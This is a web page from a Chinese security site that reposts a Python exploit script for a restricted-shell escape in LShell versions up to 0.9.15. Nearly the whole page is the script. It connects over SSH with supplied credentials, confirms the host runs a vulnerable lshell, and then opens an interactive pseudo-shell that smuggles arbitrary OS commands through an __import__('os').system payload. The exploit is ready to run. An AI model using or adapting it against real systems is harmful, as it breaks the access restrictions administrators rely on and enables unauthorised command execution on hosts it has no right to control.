首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 LShell <= 0.9.15 - Remote Code Execution 来源：@dronesec 作者：drone 发布时间：2016-03-31   import paramiko import traceback from time import sleep   # # Exploit lshell pathing vulnerability in <= 0.9.15. # Runs commands on the remote system. # @dronesec #   if len(sys.argv) < 4:     print '%s: [USER] [PW] [IP] {opt: port}'%(sys.argv[0])     sys.exit(1)   try:     print '[!] .............................'     print '[!] lshell <= 0.9.15 remote shell.'     print '[!] note: you can also ssh in and execute \'/bin/bash\''     print '[!] .............................'     print '[!] Checking host %s...'%(sys.argv[3])     ssh = paramiko.SSHClient()     ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())     if len(sys.argv) == 5:         ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])     else:         ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])         # verify lshell     channel = ssh.invoke_shell()     while not channel.recv_ready(): sleep(1)     ret = channel.recv(2048)       channel.send('help help\n')     while not channel.recv_ready(): sleep(1)     ret = channel.recv(2048)       if not 'lshell' in ret:         if 'forbidden' in ret:             print '[-] Looks like we can\'t execute SSH commands'         else:             print '[-] Environment is not lshell'         sys.exit(1)       # verify vulnerable version     channel.send('sudo\n')     while not channel.recv_ready(): sleep(1)     ret = channel.recv(2048)     if not 'Traceback' in ret:         print '[-] lshell version not vulnerable.'         sys.exit(1)     channel.close()     ssh.close()       # exec shell     print '[+] vulnerable lshell found, preparing pseudo-shell...'     if len(sys.argv) == 5:         ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2])     else:         ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])       while True:         cmd = raw_input('$ ')           # breaks paramiko         if cmd[0] is '/':             print '[!] Running binaries won\'t work!'             continue           cmd = cmd.replace("'", r"\'")         cmd = 'echo __import__(\'os\').system(\'%s\')'%(cmd.replace(' ',r'\t'))         if len(cmd) > 1:             if 'quit' in cmd or 'exit' in cmd:                 break             (stdin,stdout,stderr) = ssh.exec_command(cmd)         out = stdout.read()         print out.strip() except paramiko.AuthenticationException:     print '[-] Authentication to %s failed.'%sys.argv[3] except Exception, e:     print '[-] Error: ', e     print type(e)     traceback.print_exc(file=sys.stdout) finally:     channel.close()     ssh.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ATutor 2.2.1 Directory Travers ·Apache Jetspeed Arbitrary File ·TallSoft SNMP TFTP Server 1.0. ·PHP 7.0.4/5.5.33 - SNMP Format ·OS X Kernel Use-After-Free and ·PHP 5.5.33 - Invalid Memory Wr ·OS X Kernel - Unchecked Array ·Xion Audio Player <= 1.5 (buil ·OS X Kernel - AppleKeyStore Us ·Hexchat IRC Client 2.11.0 - CA ·OS X Kernel - Code Execution D ·Hexchat IRC Client 2.11.0 - Di   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved